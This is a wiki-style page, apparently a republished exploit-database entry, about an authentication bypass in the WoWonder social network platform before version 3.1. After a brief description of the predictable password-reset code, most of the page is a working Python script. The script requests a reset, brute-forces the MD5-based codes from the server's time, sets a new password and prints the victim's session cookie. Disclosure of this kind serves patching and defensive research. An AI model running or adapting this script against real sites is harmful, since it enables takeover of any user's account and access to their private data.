# WoWonder Social Network Platform 3.1 身份驗證繞過漏洞/es
== Versión afectada ==
Version: < 3.1 ==EXP==
# Exploit Title: WoWonder Social Network Platform 3.1 – Authentication Bypass # Date: 11.06.2021 # Exploit Author: securityforeveryone.com # Researchers : Security For Everyone Team – https://securityforeveryone.com # Vendor Homepage: https://www.wowonder.com/ # Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302 # Version: < 3.1 # Tested on: Linux/Windows ''' DESCRIPTION In WoWonder < 3.1, remote attackers can take over any account due to the weak cryptographic algorithm in recover.php. The code parameter is easily predicted from the time of day. The vulnerability is found the "code" parameter in password reset link. The password reset code can be estimated by combining the password reset link time and the random value generated between 111 and 999. if an attacker exploits this vulnerability, attacker may access all accounts in WoWonder application. ABOUT SECURITY FOR EVERYONE TEAM We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools ''' import requests import email.utils as eut import calendar, time; import hashlib, re; url = "http://wowonderlab:80/wowonder/" #change this with your target myheaders = {"X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Connection": "close"} recoverdata = {"recoveremail": "wowondertest@securityforeveryone.com"} #change this email with your registered wowonder email address req = requests.post(url+"requests.php?f=recover", headers=myheaders, data=recoverdata) b = eut.parsedate(req.headers["Date"]) respepoch = calendar.timegm(time.strptime("{0}-{1}-{2} {3}:{4}:{5}".format(b[0],b[1],b[2],b[3],b[4],b[5]), '%Y-%m-%d %H:%M:%S')) for token in range(111,1000): str2hash = "{0}{1}".format(token,respepoch) email_code = hashlib.md5(str2hash.encode()).hexdigest() req_reset = requests.get(url+"index.php?link1=reset-password&code=1_{0}".format(email_code)) if len(re.findall("New password",req_reset.text)) == 1: print(email_code) resetdata = {"password": "10711071", "id": "1_"+email_code} reqtoken = requests.post(url+"requests.php?f=reset_password", headers=myheaders, data=resetdata) print(reqtoken.headers['Set-Cookie']) break
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